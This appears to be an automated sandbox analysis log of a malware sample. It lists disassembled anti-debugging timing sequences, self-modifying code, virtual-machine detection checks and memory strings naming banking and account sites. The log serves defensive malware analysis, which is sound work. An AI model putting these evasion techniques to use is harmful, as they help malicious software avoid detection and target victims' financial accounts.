Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE007D second address: 4BE00A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F335931F158h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE00A1 second address: 4BE00A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE00A7 second address: 4BE00AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE00AB second address: 4BE00CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F335854CBC4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE00CC second address: 4BE00D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE00D2 second address: 4BE00D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE00D6 second address: 4BE0118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F335931F156h 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007F335931F150h 0x00000016 xchg eax, edi 0x00000017 pushad 0x00000018 mov dl, ch 0x0000001a mov bx, 1F1Eh 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0118 second address: 4BE011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE011C second address: 4BE0122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0122 second address: 4BE0163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F335854CBC6h 0x00000009 and cx, CD18h 0x0000000e jmp 00007F335854CBBBh 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F335854CBBCh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0163 second address: 4BE0172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0172 second address: 4BE0178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0215 second address: 4BE0227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335931F14Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0227 second address: 4BE0278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F335854CE24h 0x00000011 pushad 0x00000012 mov ah, dl 0x00000014 popad 0x00000015 lea ecx, dword ptr [ebp-14h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushfd 0x0000001e jmp 00007F335854CBC5h 0x00000023 xor ax, F056h 0x00000028 jmp 00007F335854CBC1h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0278 second address: 4BE02DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F335931F157h 0x00000009 xor cl, FFFFFF8Eh 0x0000000c jmp 00007F335931F159h 0x00000011 popfd 0x00000012 jmp 00007F335931F150h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [ebp-14h], edi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F335931F157h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0384 second address: 4BE038A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE038A second address: 4BE03C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F335931F14Bh 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F335931F155h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE03C0 second address: 4BE03EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [769B86D4h] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 push FFFFFFFEh 0x00000016 push 7741CA08h 0x0000001b push 7738AE00h 0x00000020 mov eax, dword ptr fs:[00000000h] 0x00000026 push eax 0x00000027 sub esp, 0Ch 0x0000002a push ebx 0x0000002b push esi 0x0000002c push edi 0x0000002d mov eax, dword ptr [7743B370h] 0x00000032 xor dword ptr [ebp-08h], eax 0x00000035 xor eax, ebp 0x00000037 push eax 0x00000038 lea eax, dword ptr [ebp-10h] 0x0000003b mov dword ptr fs:[00000000h], eax 0x00000041 mov dword ptr [ebp-18h], esp 0x00000044 mov eax, dword ptr fs:[00000018h] 0x0000004a test eax, eax 0x0000004c je 00007F3358590201h 0x00000052 mov dword ptr [ebp-04h], 00000000h 0x00000059 mov edx, dword ptr [ebp+08h] 0x0000005c mov dword ptr [eax+00000BF4h], edx 0x00000062 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000069 test edx, edx 0x0000006b je 00007F335854CC59h 0x00000071 xor edx, edx 0x00000073 jmp 00007F335854CB98h 0x00000075 mov eax, edx 0x00000077 mov ecx, dword ptr [ebp-10h] 0x0000007a mov dword ptr fs:[00000000h], ecx 0x00000081 pop ecx 0x00000082 pop edi 0x00000083 pop esi 0x00000084 pop ebx 0x00000085 mov esp, ebp 0x00000087 pop ebp 0x00000088 retn 0004h 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007F335854CBBDh 0x00000092 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE03EA second address: 4BE03F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE03F0 second address: 4BE03F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE03F4 second address: 4BE03F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE03F8 second address: 4BE040D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b mov edx, 538B8708h 0x00000010 push eax 0x00000011 push edx 0x00000012 mov cx, dx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE040D second address: 4BE044E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007F33CB09D1BEh 0x0000000d jmp 00007F335931F155h 0x00000012 js 00007F335931F1BDh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007F335931F153h 0x00000020 mov ebx, ecx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE044E second address: 4BE0470 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0470 second address: 4BE0483 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0483 second address: 4BE0489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0489 second address: 4BE048D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE048D second address: 4BE0491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0491 second address: 4BE0512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F33CB09D148h 0x0000000e pushad 0x0000000f mov edi, 67056370h 0x00000014 push ebx 0x00000015 mov ax, A42Bh 0x00000019 pop ecx 0x0000001a popad 0x0000001b mov ebx, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f movzx esi, dx 0x00000022 popad 0x00000023 lea eax, dword ptr [ebp-2Ch] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F335931F151h 0x0000002d and si, E7A6h 0x00000032 jmp 00007F335931F151h 0x00000037 popfd 0x00000038 pushad 0x00000039 movzx esi, dx 0x0000003c mov ebx, 01FD0A2Eh 0x00000041 popad 0x00000042 popad 0x00000043 push esp 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F335931F14Ah 0x0000004d jmp 00007F335931F155h 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0512 second address: 4BE0579 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F335854CBBCh 0x00000013 jmp 00007F335854CBC5h 0x00000018 popfd 0x00000019 jmp 00007F335854CBC0h 0x0000001e popad 0x0000001f nop 0x00000020 jmp 00007F335854CBC0h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push ecx 0x0000002a pop edi 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0637 second address: 4BE063C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE063C second address: 4BD0734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F335854CBBCh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, eax 0x0000000f jmp 00007F335854CBC1h 0x00000014 test esi, esi 0x00000016 pushad 0x00000017 mov bl, ch 0x00000019 mov edi, 1856E34Ch 0x0000001e popad 0x0000001f je 00007F33CA2CAB9Dh 0x00000025 xor eax, eax 0x00000027 jmp 00007F33585262EAh 0x0000002c pop esi 0x0000002d pop edi 0x0000002e pop ebx 0x0000002f leave 0x00000030 retn 0004h 0x00000033 nop 0x00000034 sub esp, 04h 0x00000037 mov esi, eax 0x00000039 xor ebx, ebx 0x0000003b cmp esi, 00000000h 0x0000003e je 00007F335854CCF5h 0x00000044 call 00007F335C34931Dh 0x00000049 mov edi, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F335854CBBFh 0x00000052 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BD0734 second address: 4BD073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BD073A second address: 4BD073E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BD073E second address: 4BD0742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BD0742 second address: 4BD07B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F335854CBBCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 jmp 00007F335854CBBEh 0x00000017 pushad 0x00000018 call 00007F335854CBC0h 0x0000001d pop eax 0x0000001e call 00007F335854CBBBh 0x00000023 pop esi 0x00000024 popad 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 jmp 00007F335854CBBFh 0x0000002d xchg eax, ecx 0x0000002e jmp 00007F335854CBC6h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BD07B8 second address: 4BD07BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BD07BC second address: 4BD07C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BD07C2 second address: 4BD07FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov eax, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F335931F153h 0x00000011 mov dword ptr [ebp-04h], 55534552h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F335931F155h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BD07FF second address: 4BD080F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBBCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BD080F second address: 4BD0813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BD0824 second address: 4BD0862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 leave 0x00000006 pushad 0x00000007 call 00007F335854CBBCh 0x0000000c mov edi, eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F335854CBBDh 0x00000016 xor si, 28F6h 0x0000001b jmp 00007F335854CBC1h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0A4E second address: 4BE0A88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F335931F158h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0A88 second address: 4BE0A8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0A8E second address: 4BE0AD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edx, si 0x0000000e call 00007F335931F14Ah 0x00000013 mov edi, ecx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov cx, dx 0x0000001c movsx edx, ax 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007F335931F14Eh 0x00000027 cmp dword ptr [769B459Ch], 05h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0AD9 second address: 4BE0AF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0AF6 second address: 4BE0B17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F33CB08D03Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0B17 second address: 4BE0B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0B1B second address: 4BE0B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0B1F second address: 4BE0B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0B86 second address: 4BE0B8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0B8C second address: 4BE0BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F33CA2C1B86h 0x0000000e push 76952B70h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [769B4538h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushad 0x00000057 popad 0x00000058 popad 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0BAD second address: 4BE0C3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b pushad 0x0000000c mov esi, ebx 0x0000000e pushfd 0x0000000f jmp 00007F335931F153h 0x00000014 xor ecx, 6E92E21Eh 0x0000001a jmp 00007F335931F159h 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [ebp-1Ch], esi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov edi, 013DC77Eh 0x0000002c pushfd 0x0000002d jmp 00007F335931F14Fh 0x00000032 adc eax, 3C290C2Eh 0x00000038 jmp 00007F335931F159h 0x0000003d popfd 0x0000003e popad 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0B08 second address: 4BF0B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0B0E second address: 4BF0B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0B12 second address: 4BF0B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0B16 second address: 4BF0BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F335931F14Fh 0x0000000e mov ebp, esp 0x00000010 jmp 00007F335931F156h 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 mov ax, 483Dh 0x0000001b mov dh, ch 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007F335931F154h 0x00000024 xchg eax, esi 0x00000025 jmp 00007F335931F150h 0x0000002a mov esi, dword ptr [ebp+0Ch] 0x0000002d jmp 00007F335931F150h 0x00000032 test esi, esi 0x00000034 pushad 0x00000035 call 00007F335931F14Eh 0x0000003a mov dh, al 0x0000003c pop ebx 0x0000003d popad 0x0000003e je 00007F33CB07C960h 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F335931F14Bh 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0BB2 second address: 4BF0BB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0BB8 second address: 4BF0C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 movzx eax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [769B459Ch], 05h 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F335931F14Fh 0x00000019 sbb ecx, 347A6AFEh 0x0000001f jmp 00007F335931F159h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F335931F150h 0x0000002b sbb al, FFFFFFF8h 0x0000002e jmp 00007F335931F14Bh 0x00000033 popfd 0x00000034 popad 0x00000035 je 00007F33CB0949C1h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F335931F150h 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0C36 second address: 4BF0C45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0C45 second address: 4BF0C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, EF7Ah 0x00000007 mov edi, 19868946h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F335931F159h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0C70 second address: 4BF0C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0C76 second address: 4BF0C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Special instruction interceptor: First address: DF8D4C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Special instruction interceptor: First address: DF8E63 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Special instruction interceptor: First address: FC1A05 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe TID: 3756 | Thread sleep time: -270000s >= -30000s
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe TID: 3756 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: k7T6akLcAr.exe, k7T6akLcAr.exe, 00000000.00000002.2392801868.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
